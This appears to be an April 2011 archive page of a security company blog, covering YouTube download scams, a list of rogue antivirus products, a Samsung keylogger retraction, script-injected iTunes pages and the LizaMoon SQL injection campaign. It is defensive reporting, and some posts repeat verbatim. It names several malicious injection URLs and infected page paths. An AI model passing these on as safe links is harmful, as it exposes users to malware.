Month: April 2011

There’s a lot of hot downloading action taking place at the moment in relation to the earthquake / Tsunami in Japan…most of it related to helping, sharing information, bits of media offered up for free by artists and other things.

And by other things, I mean “random videos that are useless scams”. Nestled in between a collection of “Help Japan” videos / downloads is a “World mask art” download – advertised as “free”, naturally.

Click to Enlarge

Do you think this is going to end well, dear reader?

Click to Enlarge

Our uploader (called, er, “Porkballer12”) has lobbed 300+ videos onto Youtube in the space of a day or so, and all of them point to the same link – doesn’t matter if it says “World mask art”, “free finance powerpoints” or various kinds of security software. The shortened URL will bounce you from freecracksoftware(dot)com/software to a download site, complete with – you’ve guessed it – a survey.

Click to Enlarge

Hitting the frontpage of that website instead of visiting the redirection link will also pop a survey:

Click to Enlarge

Call me crazy, but I don’t think you’re going to end up with whatever advertised product brought you to the land of eternal surveys.

Christopher Boyd

There’s a lot of hot downloading action taking place at the moment in relation to the earthquake / Tsunami in Japan…most of it related to helping, sharing information, bits of media offered up for free by artists and other things.

And by other things, I mean “random videos that are useless scams”. Nestled in between a collection of “Help Japan” videos / downloads is a “World mask art” download – advertised as “free”, naturally.

Click to Enlarge

Do you think this is going to end well, dear reader?

Click to Enlarge

Our uploader (called, er, “Porkballer12”) has lobbed 300+ videos onto Youtube in the space of a day or so, and all of them point to the same link – doesn’t matter if it says “World mask art”, “free finance powerpoints” or various kinds of security software. The shortened URL will bounce you from freecracksoftware(dot)com/software to a download site, complete with – you’ve guessed it – a survey.

Click to Enlarge

Hitting the frontpage of that website instead of visiting the redirection link will also pop a survey:

Click to Enlarge

Call me crazy, but I don’t think you’re going to end up with whatever advertised product brought you to the land of eternal surveys.

Christopher Boyd

Researcher Patrick Jordan put together some statistics on the various Rogues he sees on a daily basis, and I thought it made for some interesting reading.

How are the rogue AV products shaping up in terms of monthly / yearly numbers? Let’s take a look at what Patrick has pulled out of a fiery lake of evil through the years:

Click to Enlarge

No surprises that the new finds keep coming, with the foot really hitting the gas pedal in 2008 and never really letting up. In terms of rogues from various families doing the rounds in 2011 (from the 1st of January to the 31st of March), we have a clear winner:

The PrivacyCenter rogue sweeps all aside, and probably accepts some sort of award for services to scamming people out of their money (Patrick tells me that “MSE stands for Microsoft Security Essentials which is the fake alert used with the MSE extension”). While I’m not a huge fan of long lists, the following long list gives you an idea of the overwhelming nature of so many fake products hitting the net every other day:

1/4/2011            Palladium.FakeRean
1/4/2011            HDDFix.FakeSysDef
1/5/2011            MemoryFixer.FakeSysDef
1/9/2011            DiskOK.FakeSysDef
1/12/2011          GoodMemory.FakeSysDef
1/12/2011          FastDisk.FakSysDef
1/12/2011          WindowsSystemOptimizator
1/15/2011          DiskOptimizer.FakeSysDef
1/17/2011          WindowsOptimization&Security
1/18/2011          MemoryOptimizer.FakeSysDef
1/18/2011          WindowsSecurity&Control
1/20/2011          WindowsUtilityTool
1/21/2011          WindowsScan.FakeSysDef
1/25/2011          WindowsUniversalTool
1/26/2011          Antivirus.Net.FakeSpyPro
1/26/2011          WindowsRiskEliminator
1/27/2011          SmartInternetProtection2011.FakeVimes
1/28/2011          WindowsDisk.FakeSysDef
1/28/2011          AVG-Antivirus.FakeXPA
1/28/2011          WindowsAntispywareSolution
1/28/2011          WindowsShieldCenter
1/31/2011          WindowsHealthCenter
2/1/2011            WindowsProblemsRemover
2/2/2011            WindowsProblemsProtector
2/3/2011            WinDisk.FakeSysDef
2/4/2011            DiskRecovery.FakeSysDef
2/4/2011            InternetSecurity2011.RTK
2/5/2011            WindowsSafetyProtection
2/6/2011            WindowsSoftwareProtection
2/7/2011            PCSecurity2011.FakeSpyPro
2/7/2011            WindowsSoftwareGuard
2/8/2011            WindowsWiseProtection
2/9/2011            AntiViraAV.FakeSpyPro
2/9/2011            WindowsCareTool
2/10/2011          WindowsOptimalSolution
2/11/2011          WindowsOptimalSettings
2/11/2011          AntivirusSystem2011
2/11/2011          InternetSecurityDefender2011
2/14/2011          WindowsProblemsSolution
2/15/2011          WindowsUserSatellite
2/17/2011          WindowsExpressHelp
2/18/2011          WindowsAVSoftware
2/20/2011          WindowsSafetyGuarantee
2/21/2011          InternetSecurityEssentials.FakeVimes
2/21/2011          WindowsOptimalTool
2/22/2011          WindowsExpressSettings
2/22/2011          MegaAntivirus2012
2/23/2011          InternetDefender
2/25/2011          WindowsTool.FakeSysDef
2/25/2011          WindowsPrivacyAgent
2/26/2011          WindowsProcessesOrganizer
2/28/2011          WindowsTroublesAnalyzer
3/1/2011            WindowsPerformanceManager
3/2/2011            AntiMalwareGo.FakeSpyPro
3/2/2011            WindowsEfficiencyManager
3/3/2011            AntiVirusAntiSpyware2011
3/3/2011            XPHomeSecurity.FakeRean
3/3/2011            WindowsDebugSystem
3/5/2011            AntivirusMonitor.FakeSpyPro
3/7/2011            WindowsErrorCorrection
3/8/2011            WindowsDefenceCenter
3/9/2011            WindowsServantSystem
3/10/2011          SystemDefender
3/10/2011          WindowsTroublemakersAgent
3/11/2011          WindowsTroublesRemover
3/13/2011          WindowsDiagnostic.FakeSysDef
3/14/2011          WindowsRemedy
3/16/2011          BestMalwareProtection.FakeVimes
3/16/2011          E-SetAntivirus2011.FakeXPA
3/16/2011          WindowsThreatsRemoving
3/17/2011          WindowsEfficiencyMagnifier
3/18/2011          WindowsSafeMode.FakeSysDef
3/18/2011          SystemDiagnostic.FakeSysDef
3/18/2011          WindowsEmergencySystem
3/21/2011          CleanThis.FakeRean
3/21/2011          WindowsSupportSystem
3/22/2011          WindowsLowlevelSolution
3/23/2011          WindowsRecovery.FakeSysDef
3/23/2011          WindowsBackgroundProtector
3/24/2011          WindowsSimpleProtector
3/25/2011          WindowsPowerExpansion
3/26/2011          MSRemovalTool
3/28/2011          WindowsExpansionSystem
3/29/2011          WindowsRepair.FakeSeysDef
3/30/2011          WindowsProcessRegulator
3/31/2011          WindowsStabilityCenter

Pretty crazy. As always, if you happen to find yourself on a website with flashing infection alerts and constant offers to download a “security program”, ignore the prompts, don’t fill in any information and run the other way.

Thanks Patrick.

Christopher Boyd

Researcher Patrick Jordan put together some statistics on the various Rogues he sees on a daily basis, and I thought it made for some interesting reading.

How are the rogue AV products shaping up in terms of monthly / yearly numbers? Let’s take a look at what Patrick has pulled out of a fiery lake of evil through the years:

Click to Enlarge

No surprises that the new finds keep coming, with the foot really hitting the gas pedal in 2008 and never really letting up. In terms of rogues from various families doing the rounds in 2011 (from the 1st of January to the 31st of March), we have a clear winner:

The PrivacyCenter rogue sweeps all aside, and probably accepts some sort of award for services to scamming people out of their money (Patrick tells me that “MSE stands for Microsoft Security Essentials which is the fake alert used with the MSE extension”). While I’m not a huge fan of long lists, the following long list gives you an idea of the overwhelming nature of so many fake products hitting the net every other day:

1/4/2011            Palladium.FakeRean
1/4/2011            HDDFix.FakeSysDef
1/5/2011            MemoryFixer.FakeSysDef
1/9/2011            DiskOK.FakeSysDef
1/12/2011          GoodMemory.FakeSysDef
1/12/2011          FastDisk.FakSysDef
1/12/2011          WindowsSystemOptimizator
1/15/2011          DiskOptimizer.FakeSysDef
1/17/2011          WindowsOptimization&Security
1/18/2011          MemoryOptimizer.FakeSysDef
1/18/2011          WindowsSecurity&Control
1/20/2011          WindowsUtilityTool
1/21/2011          WindowsScan.FakeSysDef
1/25/2011          WindowsUniversalTool
1/26/2011          Antivirus.Net.FakeSpyPro
1/26/2011          WindowsRiskEliminator
1/27/2011          SmartInternetProtection2011.FakeVimes
1/28/2011          WindowsDisk.FakeSysDef
1/28/2011          AVG-Antivirus.FakeXPA
1/28/2011          WindowsAntispywareSolution
1/28/2011          WindowsShieldCenter
1/31/2011          WindowsHealthCenter
2/1/2011            WindowsProblemsRemover
2/2/2011            WindowsProblemsProtector
2/3/2011            WinDisk.FakeSysDef
2/4/2011            DiskRecovery.FakeSysDef
2/4/2011            InternetSecurity2011.RTK
2/5/2011            WindowsSafetyProtection
2/6/2011            WindowsSoftwareProtection
2/7/2011            PCSecurity2011.FakeSpyPro
2/7/2011            WindowsSoftwareGuard
2/8/2011            WindowsWiseProtection
2/9/2011            AntiViraAV.FakeSpyPro
2/9/2011            WindowsCareTool
2/10/2011          WindowsOptimalSolution
2/11/2011          WindowsOptimalSettings
2/11/2011          AntivirusSystem2011
2/11/2011          InternetSecurityDefender2011
2/14/2011          WindowsProblemsSolution
2/15/2011          WindowsUserSatellite
2/17/2011          WindowsExpressHelp
2/18/2011          WindowsAVSoftware
2/20/2011          WindowsSafetyGuarantee
2/21/2011          InternetSecurityEssentials.FakeVimes
2/21/2011          WindowsOptimalTool
2/22/2011          WindowsExpressSettings
2/22/2011          MegaAntivirus2012
2/23/2011          InternetDefender
2/25/2011          WindowsTool.FakeSysDef
2/25/2011          WindowsPrivacyAgent
2/26/2011          WindowsProcessesOrganizer
2/28/2011          WindowsTroublesAnalyzer
3/1/2011            WindowsPerformanceManager
3/2/2011            AntiMalwareGo.FakeSpyPro
3/2/2011            WindowsEfficiencyManager
3/3/2011            AntiVirusAntiSpyware2011
3/3/2011            XPHomeSecurity.FakeRean
3/3/2011            WindowsDebugSystem
3/5/2011            AntivirusMonitor.FakeSpyPro
3/7/2011            WindowsErrorCorrection
3/8/2011            WindowsDefenceCenter
3/9/2011            WindowsServantSystem
3/10/2011          SystemDefender
3/10/2011          WindowsTroublemakersAgent
3/11/2011          WindowsTroublesRemover
3/13/2011          WindowsDiagnostic.FakeSysDef
3/14/2011          WindowsRemedy
3/16/2011          BestMalwareProtection.FakeVimes
3/16/2011          E-SetAntivirus2011.FakeXPA
3/16/2011          WindowsThreatsRemoving
3/17/2011          WindowsEfficiencyMagnifier
3/18/2011          WindowsSafeMode.FakeSysDef
3/18/2011          SystemDiagnostic.FakeSysDef
3/18/2011          WindowsEmergencySystem
3/21/2011          CleanThis.FakeRean
3/21/2011          WindowsSupportSystem
3/22/2011          WindowsLowlevelSolution
3/23/2011          WindowsRecovery.FakeSysDef
3/23/2011          WindowsBackgroundProtector
3/24/2011          WindowsSimpleProtector
3/25/2011          WindowsPowerExpansion
3/26/2011          MSRemovalTool
3/28/2011          WindowsExpansionSystem
3/29/2011          WindowsRepair.FakeSeysDef
3/30/2011          WindowsProcessRegulator
3/31/2011          WindowsStabilityCenter

Pretty crazy. As always, if you happen to find yourself on a website with flashing infection alerts and constant offers to download a “security program”, ignore the prompts, don’t fill in any information and run the other way.

Thanks Patrick.

Christopher Boyd

Kabay apologies (elegantly) this afternoon.  Forensics completely vindicate Samsung.  

There really is no keylogger installed on Samsung laptops.  Period.

Alex Eckelberry

A “market” based approach to getting companies to fix vulnerabilities.

Vulnarb.com is an idea I’ve had for a while but only recently figured out how I might do it. The problem it solves is allowing security researchers to responsibly release vulnerabilities they find, but still publicly report that a company has a vulnerable product.

It’s worth noting that Zed Shaw, the guy who is starting this, is a legendary programmer in the world of open source web frameworks.

Link here.

Alex Eckelberry
(Thanks Matthew)

On that whole SQL injection thing, here’s an interesting one I found while stumbling around researching today.

Hmm…What’s that all about? Any more pages like this? Let’s see!

Well, yeah. There’s err, a few.

I found a some more, and it doesn’t seem like a huge amount, but something that Apple should certainly clean up.

itunes.apple.com/us/podcast/turkish/id161320202
itunes.apple.com/pl/podcast/cuneyt/id152442304
itunes.apple.com/kr/podcast/belgesel-title-script-src/id206817953

These pages have live malware on them…

(There may be more but it’s Saturday evening and I have a life.)

Alex Eckelberry

Alas, the news was published on April 1^st. But it is not a joke.

Curious, I spent a bit of time today researching it (when I really was supposed to be doing other things), and while the “lizamoon” url is down, there are still a number of other URLs active on this one.

Without a lot of effort, I found infections using other URLs, which include

t6ryt56.info/ur.php
tadygus.com/ur.php
milapop.com/ur.ph
books-loader.info/ur.php

(These are all malicious, so obviously don’t go to them unless you know what you’re doing, etc.)

However, I doubt the infection is as massive as is being stated. For unique sites, perhaps a few thousand. More pages than that, but in terms of unique domains, not a million, as might have been inferred from articles.  

What’s curious is I found something else that was interesting —  encoded View State with malicious URLs injected into the site.

For example, here’s a screenshot of an example encoded View State that I found on one of the injected sites.

First, an infected page (with VIPRE yelling away that there’s a problem in the corner — sorry, can’t help the shameless self-promotion).

So let’s take a look at the page source:

Yuck! What’s all that? It’s encoded View State.

So we go to a handy-dandy decoder, paste the offending text, do a little “where’s Waldo” and there you have it:

How cool is that?

And yes, that is really painfully sloppy stuff.

Alex Eckelbery
(Obligatory hat tip to Jose)

Peter Kleissner has published a rather tasteless April fools joke, a supposed article that states he has been convicted of selling Ikarus source code.  Ikarus is his former employer, and is the subject of a current squabble.  

Kleissner, a brash and very smart Austrian 20–year old, gained notoriety as a teenager at Blackhat 2009 by releasing Stoned Bootkit, an MBR rootkit he created.  This created all kinds of messiness, being banned from the AV community and fired from his job at Ikarus.  Things got uglier when he published a site, avtracker, which tracks what IP numbers antivirus companies use (hence, assisting malware authors in avoiding detection).  Not good. There’s much more to say about Kleissner, whose antics are sometimes dizzying.  I’ll leave that story for someone else.

Alex Eckelberry

Network World has published a retraction of the original story on the Samsung non-kleylogger.

Alex Eckelberry

I think we all know the answer to the question of whether or not I’ll be watching a movie involving a giant robot Samurai waving a chaingun around this weekend, but it’s worth noting that – as with anything movie related – the “fill in the survey / download a program to watch the content” sites are out in force. Step up to the plate, eleventy billion promos for Sucker Punch:

Click to Enlarge

Example site:

Click to Enlarge

Click to Enlarge

As usual, you’re being asked to install something or (elsewhere) fill in a survey:

The Leechtv(dot)com site interested me because unlike the majority that throw up a fake Youtube player screenshot, this one teases the viewer by playing the first ten or so seconds in a real clip player before “freezing” the clip then launching the popup. I guess that could potentially lure someone into jumping through the required hoops to view the content (if the rest of the content is even there in the first place, that is).

As you might expect, there’s also the usual collection of adf.ly links that generate money for the link creator but send the user to cookie-cutter spamblogs, and “movie sites” that actually just want to sign up to recurring credit card charges for monthly membership.

Don’t waste your time with any of them.

Christopher Boyd